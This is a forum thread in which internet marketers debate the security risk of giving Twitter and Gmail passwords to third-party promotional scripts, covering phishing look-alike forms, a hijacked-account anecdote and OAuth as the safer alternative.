Your Twitter Account Has Been Hacked... And *You* Are To Blame?

by Paul Hancox 20 replies
Hi Folks

OK, this has been on my mind for a while now. What I'm about to say isn't
going to be popular with some people - but I've got to say it, anyway!

Andy Beard recently posted on his blog about the spate of new tools and
"viral" scripts that require your Twitter (or Gmail) password in order to
use it.

He is seriously concerned about the security risks - and quite frankly, so
am I.

Now, please understand... my problem IS NOT so much with the scripts
themselves. Most of them claim NOT to store the password provided by
the visitor, and I have no doubt those claims are true.

Here's my problems with them... Let me paint you a picture:

Jo is a scammer. He sets up a perfectly legitimate looking site, offering
internet marketers a load of bonus products for free, in exchange for their
Twitter username and password.

He provides a form, using a recognizable viral Twitter tool, and you type
in your details, because you trust the tool.

Unfortunately for you, Jo is NOT really using the actual tool, but simply a
form which LOOKS LIKE IT.

You have just given Jo the scammer your Twitter password. Oops. 10 days
later (when you've likely forgotten which site(s) you've used to collect all
kinds of cool bonuses... your Twitter account is suddenly hijacked.

You don't know why. But Jo does.

You gave him the keys.

That is my problem.

If Jo hacks into your account, aren't you at least partly to blame because
you gave him your password?

As people become more accustomed to doing this (i.e. giving out their
Twitter password), surely they're increasing the chances they will bump
into an unscrupulous person like Jo on the Internet.

Of course, that means you should only give it out to sites that you trust.

The problem there is, many people don't follow this - they give it out to all
kinds of sites because they want the bonus or convenience being offered.

That is why, personally speaking, I will almost never give my Twitter
password out to ANY site. If I HAVE TO, I will temporarily change my
password first, and change it back again when I've finished.

In fact, I am in the middle of writing a viral tool for Twitter that does NOT
require anybody's password - partly because I'm a capitalistic Warrior, but
partly because I'm getting pretty worried by the growing trend for scripts
and forms that ask for passwords...

... quite frankly, it's got to stop! (In my humble opinion, of course.)

So how do you feel about this issue?

As I said at the outset, I don't think this is going to be a popular
viewpoint, because an increasing number of marketers are using such
scripts and plug-ins.

I have no doubt the people using them are honest. BUT... could this
increasing number of people be conditioning the market to do something
they shouldn't be doing, i.e. giving out passwords to their accounts?
#main internet marketing discussion forum #account #blame #hacked #twitter
Avatar of Unregistered
  • Profile picture of the author bizarizona
    It seems many of those sites are finally getting on the Oauth bandwagon. Most of them haven't been because Twitter was dragging their heels.

    I don't know much about Twitter marketing tools, but I do use a few Twitter tools to manage my Twitter horde. Just in the past week I've seen almost every other Twit tool out there finally adding the secure login.

    I think it's good practice to change your password very regularly anyway.
    • Profile picture of the author AndyBeard
      You know you can always trust warriors, so we are going to do a little experiemnt

      Please post below your real:-

      Gmail username & password

      Twitter username password below


      Ok send them to me in a PM, you know you can trust me with the keys to your business

      All those domain registrations
      Hosting accounts

      Still no?

      So why would you trust anyone running an invite script on a poorly secured shared server, running GPL scripts which have security holes patched every week?
      I think Paul's scenario is actually less likely, because there is that trust barrier. Much better to find someone who is trusted and hack their server.

      Maybe they are even using the script as part of their affiliate promotions - you can get paid to send traffic to a hacked script, and collect all the details for your own devious plans.

      Security holes?

      As an example, I could look for anyone running old Wordpress versions, especially if they are using WordPress as a membership site, or maybe some of the scripts sold in the WSO section that have been knocked together by freelancers or are not much better than alpha.

      Just at random I checked one site, saw it was WP 2.61

      Googled Zero day Wordpress 2.61

      Lots of security warnings advising upgrades to 2.62

      The fun part is if someone hacks one script, they can potentially gain access to not just the hosting account, but the whole server.

      The most dangerous part which Paul highlighted brilliantly is the psychological effect - you become accustomed to handing these things out, as if it is the same as an email address.

      People have made fortunes selling you viral tell-a-friend scripts which are a liability, and there have been solutions to make them safe for 9 months.
  • Profile picture of the author Paul Hancox
    Great reminder about changing passwords. As for secure login, isn't it interesting... most people would *insist* on Gmail or Twitter themselves having a secure login facility, yet they may happily give their password out through an UNSECURE form on somebody's site! :O
  • Profile picture of the author Tyrus Antas
    There is no real reason to require passwords. All developers can use the OAuth api in which users are required to give manual permission for a website to access their account while not needing to give away their password:
    Twitter API Wiki / OAuth FAQ

    yes -no
  • Profile picture of the author Darrel Hawes
    People need to be vigilant about phishing schemes.

    One helpful tool I've used is McAfee Site Advisor.
    Darrel Hawes - Blog
    • Profile picture of the author ladyshadowrider
      Here's a true story that happened to me recently.

      Someone I trust posted on a private forum asking for people to test out a retweet plugin he'd just installed on his blog. Since he was someone I've known online for several years, I went to his blog and tried it out by entering my login info into the form to retweet his blog post.

      Within a couple of days I started getting 5, 10, 15 new followers, which I thought was pretty cool, at first.

      When I went into my twitter account, I discovered that several of my most recent tweets were gone and that every new follower (most of which was twitter spam) had somehow gotten my account to automatically follow them!

      I immediately changed my password and began clearing out the spam. Haven't had any problems since, so can only "assume" the retweet plugin was the culprit.

      It could have been worse and I'm sure the guy who's blog I retweeted had no idea that this would happen.

      So, not only should we be careful about where we enter our login info, but we need to be careful about the twitter tools we use on our sites.

  • Profile picture of the author AndyBeard
    Darrel, McAfee isn't going to help you if the site is owned by one of your clients who you trust

    The site is exactly who they claim to be, they are not installing anything on your system, just asking for your details in exchange for a bonus.

    But unknown even to the site owner, someone might have hacked their way into WordPress, maybe through an insecure plugin.

    That in itself isn't a major problem, there are daily backups, if it happens it is forgivable, even if the hacker gained access to email addresses.

    The hacker might also get hold of one Twitter account, because most Twitter plugins store passwords in the MySQL database.

    But why raid the pantry when there is a huge stack of gold in the next room, a simple form, asking someone to tell their friends about the site in exchange for an exclusive additional bonus.

    The hacker just modifies 2 lines of code, and instead of functioning just as a TAF script, it also stores all the data somewhere, or immediately sends it to another server and database, or sends it by email to an anonymous email address.
  • Profile picture of the author Steven Fullman
    Originally Posted by Paul Hancox View Post

    If Jo hacks into your account, aren't you at least partly to blame because
    you gave him your password?
    Partly to blame?

    What are you, Paul...some kind of...ohhh...this stuff makes me come out in goddamned HIVES...Blame?

    I'm not partly to blame for any of it.

    AT ALL.


    I'm completely at fault for giving away my details to an untrusted source.

    It's MY fault.

    And YOURS if you do the same.

    Nice post, you brummie *******


    That reminds me (or have you induced me...), I must catch up on Video #3...

    ...And talking of hypnosis...have you seen the Awareness Test?


    Not promoting right now

  • Profile picture of the author Mary Green
    I agree with your comments about twitter tools. I get uncomfortable having to put in my password as well. I am looking forward to the twitter tool you are making, you should start a list of people to send it to.

    Mary Green
  • Profile picture of the author stevenh512
    Of course, if you give out any of your passwords and your account gets "hacked" (I consider that more a "social engineering" exploit than an actual hack, but let's not argue semantics here lol), it's your own fault. We've all been told by every website we've ever signed up for since we got online (banks, email accounts, forums, membership sites) to keep our passwords safe.

    That being said, I think at least part of the blame here has to be put on Twitter for releasing an API that required username and password for authentication. They have OAuth now, but it's too late, the damage has been done. All these dozens of scripts are already out there "in the wild" asking for people's Twitter username and password. Even if the authors of these scripts upgrade them to use OAuth, that doesn't guarantee that the sites who already have the scripts up and running are going to upgrade them, so no matter what you'll still have sites "training" people to freely give out their Twitter password in exchange for some cheap ebooks or a promise of "thousands of followers in a month" or whatever the case may be. At this point the only way to solve the problem (since people will continue entering their password as long as these sites exist) is for Twitter to completely eliminate username/password authentication in their API and require all apps to use OAuth.

    This signature intentionally left blank.

  • Profile picture of the author Carl Pruitt
    Given the ingenuity hackers have always possessed, our online security is tenuous enough without leaving the doors unlocked.

    I've been almost as concerned with the glut of different FB apps and other services wanting my email password to bring in my contacts. I choose not to participate in that, but quite a lot of information is revealed to FB apps when your friends allow them access. Information which could help enable hackers to guess passwords. (Hint: don't use any combination of the elements of your birthdate in any passwords.)

    Carl Pruitt

    • Profile picture of the author Eric Lorence
      Maybe 20% of the ones reading this thread, and newbie webmasters in general, have any understanding of web security... GPL? SQL? wad dat?

      I fully agree with Andy, some of the most "trusted" sites pose the most risk... Gmail??

      You almost need to have a "throw away" identity to use online anymore.

      And maybe that site owner did have every intention of stealing your Twitter account (hypothetically), how well can you ever know them?
  • Profile picture of the author AndyBeard
    Steven, Twitter certainly can be blamed in part, but remember that many of these applications just want your password to send a tweet, not check who you follow, add follows etc.
    Verification that you sent a tweet can be achieved just by monitoring your timeline or a #hashtag, and you can be required to follow an account to receive an DM.

    With Tell A Friend scripts, the APIs for Google, Yahoo and MSN have been around for 9 months or so. It has taken some large sites a long time to implement them, but there are also services that provide ready made drop in code.

    Plus there is no real need to use APIs anyway, all major services support mailto: with encoded email title and body contents, and you can provide a unique tracking link for each person, passing through a separate domain.
    Then the user is really using their own email system to send the email to their friends.
    • Profile picture of the author stevenh512
      Originally Posted by AndyBeard View Post

      Steven, Twitter certainly can be blamed in part, but remember that many of these applications just want your password to send a tweet, not check who you follow, add follows etc.
      Verification that you sent a tweet can be achieved just by monitoring your timeline or a #hashtag, and you can be required to follow an account to receive an DM.
      There's no need to get someone's Twitter password just to send a tweet, but you're right, a lot of the "viral" scripts do ask for a password just to do something that could just as easily be done with a standard HTML link.

      If I want to verify (through the API) that someone actually sent a tweet from my website, for example to give them a "gift" for tweeting something, I can do that by putting @myname somewhere in the tweet and having my script log into the API through my own Twitter account to check my @replies. I wouldn't need the end-user's Twitter password at all, just their user name.

      Twitter has to take some of the blame for the problem here because of the way they designed their API.. but the same can be said for the authors of some of these viral scripts that use the API in ways that aren't really necessary to accomplish whatever the script needs to do. But ultimately, like I said before, if you give out your password to anyone and your account gets hacked it's your own fault, you should know better.

      This signature intentionally left blank.

Trending Topics